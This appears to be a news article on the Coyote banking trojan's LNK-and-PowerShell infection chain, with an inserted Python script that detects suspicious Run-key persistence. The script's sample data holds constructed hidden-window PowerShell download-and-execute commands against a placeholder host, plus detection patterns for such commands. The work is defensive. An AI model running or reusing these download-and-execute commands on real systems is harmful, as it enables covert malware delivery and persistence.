info@thehackernews.com (The Hacker News)
2025-02-03 06:39:00
thehackernews.com
Brazilian Windows users are the target of a campaign that delivers a banking malware known as Coyote.
“Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials,” Fortinet FortiGuard Labs researcher Cara Lin said in an analysis published last week.
The cybersecurity company said it discovered over the past month several Windows Shortcut (LNK) file artifacts that contain PowerShell commands responsible for delivering the malware.
Coyote was first documented by Kaspersky in early 2024, detailing its attacks targeting users in the South American nation. It’s capable of harvesting sensitive information from over 70 financial applications.
In the previous attack chain documented by the Russian cybersecurity firm, a Squirrel installer executable is used to trigger a Node.js application compiled with Electron, which in turn runs a Nim-based loader to execute the malicious Coyote payload.
The latest infection sequence, on the other hand, commences with an LNK file that executes a PowerShell command to retrieve the next stage from a remote server (“tbet.geontrigame[.]com”): another PowerShell script that launches a loader responsible for executing an interim payload.
“The injected code leverages Donut, a tool designed to decrypt and execute the final MSIL (Microsoft Intermediate Language) payloads,” Lin said. “The decrypted MSIL execution file first establishes persistence by modifying the registry at ‘HKCU\Software\Microsoft\Windows\CurrentVersion\Run.’”
“If found, it removes the existing entry and creates a new one with a randomly generated name. This new registry entry contains a customized PowerShell command pointing to download and execute a Base64-encoded URL, which facilitates the main functions of the Coyote banking trojan.”
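The persistence technique described above, a Run-key value with a random-looking name whose data is a PowerShell command that decodes a Base64 string and downloads the next stage, leaves a pattern that is easy to hunt for. The following Python script is an added example written for this article, not code from The Hacker News, Fortinet, or the malware; it scans a constructed set of `HKCU\...\Run` values (as they might appear in a registry export) and flags entries that launch PowerShell together with an encoded argument, a download-and-execute primitive, a hidden window, or a random-looking value name, decoding any embedded Base64 so an analyst can see the URL. The value names, the `example.invalid` URLs and the scoring heuristic are assumptions for illustration, not indicators from the page.

```python
import base64
import re

# Constructed placeholder for a second-stage URL (not a real indicator).
STAGE_URL = "https://example.invalid/stage2.ps1"
ENCODED_URL = base64.b64encode(STAGE_URL.encode()).decode()

# Constructed -enc payload: PowerShell encodes these as UTF-16LE before Base64.
ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')"
    .encode("utf-16-le")
).decode()

# Constructed sample of Run-key values (value name -> command line).
# The two benign entries mimic common legitimate autostarts; the two others
# mimic the persistence style described in the article.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
    "xK9qT2vPw": (
        "powershell.exe -NoProfile -WindowStyle Hidden -Command "
        "\"IEX (New-Object Net.WebClient).DownloadString("
        "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('" + ENCODED_URL + "')))\""
    ),
    "Updater": "powershell -w hidden -enc " + ENC_PAYLOAD,
}

PS_EXE = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_EXEC = re.compile(
    r"FromBase64String|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression",
    re.I,
)
# Heuristic: 8-16 alphanumerics mixing digits, lower and upper case, e.g. "xK9qT2vPw".
RANDOM_NAME = re.compile(r"(?=.*\d)(?=.*[a-z])(?=.*[A-Z])[A-Za-z0-9]{8,16}")
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_embedded(command):
    """Return decoded text for Base64 literals and -enc payloads found in the command."""
    decoded = []
    for m in B64_LITERAL.finditer(command):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
        except ValueError:
            pass  # not valid Base64; leave it to the analyst
    for m in ENC_ARG.finditer(command):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-16-le", "replace"))
        except ValueError:
            pass
    return decoded


def assess_run_value(name, command):
    """Score one Run-key value; suspicious when PowerShell is launched plus any other signal."""
    reasons = []
    if PS_EXE.search(command):
        reasons.append("launches powershell")
    decoded = decode_embedded(command)
    # Match download/execute primitives in the raw command and in anything we decoded.
    text = command + " " + " ".join(decoded)
    if ENC_FLAG.search(command):
        reasons.append("encoded command argument")
    if DOWNLOAD_EXEC.search(text):
        reasons.append("download/execute primitive")
    if HIDDEN.search(command):
        reasons.append("hidden window")
    if RANDOM_NAME.fullmatch(name):
        reasons.append("random-looking value name")
    suspicious = "launches powershell" in reasons and len(reasons) >= 2
    return {"name": name, "suspicious": suspicious, "reasons": reasons, "decoded": decoded}


def scan_run_values(values):
    """Return the assessments for every value that was flagged as suspicious."""
    return [r for r in (assess_run_value(n, c) for n, c in values.items()) if r["suspicious"]]


if __name__ == "__main__":
    for hit in scan_run_values(SAMPLE_RUN_VALUES):
        print(hit["name"], hit["reasons"], hit["decoded"])
```

On a live host the same logic can be fed from `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"` or from a Sysmon Event ID 13 (registry value set) feed; the random-name heuristic is deliberately weak on its own and only adds weight once a PowerShell launch is already present, which keeps well-known autostarts out of the results.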
The malware, once launched, gathers basic system information and the list of installed antivirus products on the host, after which the data is Base64-encoded and exfiltrated to a remote server. It also performs various checks to evade detection by sandboxes and virtual environments.
A notable change in the latest iteration of Coyote is the expansion of its target list to encompass 1,030 sites and 73 financial agents, such as mercadobitcoin.com.br, bitcointrade.com.br, foxbit.com.br, augustoshotel.com.br, blumenhotelboutique.com.br, and fallshotel.com.br.
Should the victim attempt to access any one of the sites in the list, the malware contacts an attacker-controlled server to determine the next course of action, which can range from capturing a screenshot to serving overlays. Other functions include activating a keylogger and manipulating display settings.
“Coyote’s infection process is complex and multi-staged,” Lin said. “This attack leveraged an LNK file for initial access, which subsequently led to the discovery of other malicious files. This Trojan poses a significant threat to financial cybersecurity, particularly because it has the potential to expand beyond its initial targets.”